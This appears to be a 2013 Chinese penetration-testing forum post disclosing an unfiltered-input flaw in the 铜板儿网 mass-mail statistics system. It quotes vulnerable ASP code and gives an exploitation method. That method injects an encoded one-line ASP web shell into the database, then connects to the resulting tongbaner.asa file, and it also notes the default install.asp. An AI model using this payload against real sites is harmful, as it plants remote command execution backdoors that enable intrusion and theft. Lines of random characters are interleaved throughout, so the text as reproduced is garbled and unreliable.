中国网络渗透测试联盟
标题:
铜板儿网邮件群发统计系统 v1.2 漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:14
标题:
铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp
9 X& J8 i# J0 @; I6 f9 @$ S
9 `7 K8 `/ n7 X6 Y, V
IF Request.QueryString("Action")="del" Then
3 Q4 ~1 ]! r0 I! i7 k
ID=Request.QueryString("ID")
+ `0 F% r# a; I8 M) K
IF Countss ("tui","Fenlei",ID )<>0 then
/ b# ~: A: Z' C4 Y
'略
+ E& W( O9 y& C& c
IF Request.QueryString("Action")="Add" Then
1 i5 d/ ]3 u( ~# @
Tname=Request.Form("Typename")
) |0 |* \* i; g
Set Rs=Server.CreateObject("adodb.Recordset")
- D+ P. T6 c" I' E
Sql="Select * From Fenlei Order by id Desc "
' d0 ^9 y9 i2 U# ?1 M+ v
Rs.Open Sql,Conn,1,3
/ }+ ~6 k- G; r" G" s( i; c
Rs.Addnew
- C2 j- ]5 j+ @) T; U& _
Rs("Typename")=Tname
* l Z/ E4 U. {3 M8 X% I
'略
% j( Z/ G3 t4 D' B4 \
Set Rs=Server.CreateObject("adodb.Recordset")
- h# _( K# l0 U# f
Sql="Select * From Fenlei Order by id Desc "
4 F! j- U# B' s1 [0 W
Rs.Open Sql,Conn,1,1
% u E# l! D- B
'略
3 U" Z+ U! ]3 T/ ]6 q
%>
2 K# w1 k* b# C: J4 y
! N3 W. E8 H5 i$ `( @
2 e- U2 P% E9 C2 S& I3 K" P
4 D0 Z" u/ n. l& g8 v K+ r0 N
没有过滤,直接写入数据库。
! M g! t& T3 H% p; M. ]" B* y
1 s( e" j& p( o( s6 o
利用方法:
: d9 j- `- f# _9 h" w
; b, w! K6 N, _% c5 x; A9 e) O
插入:┼攠數畣整爠煥敵瑳∨≡┩>
9 O$ S/ G7 S% p8 e2 _0 m
4 E5 h) ~: b$ r* N0 X: s
1 ~' e7 h) y/ t8 d" S
连接:
http://www.xxx.com/###tongbaner.asa
: f6 C! G7 V" k* m/ ^1 w- m
'默认安装文件:
# Q, X' t7 z$ k- `; Q) H
'install.asp
" m% S6 Z4 t5 b
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2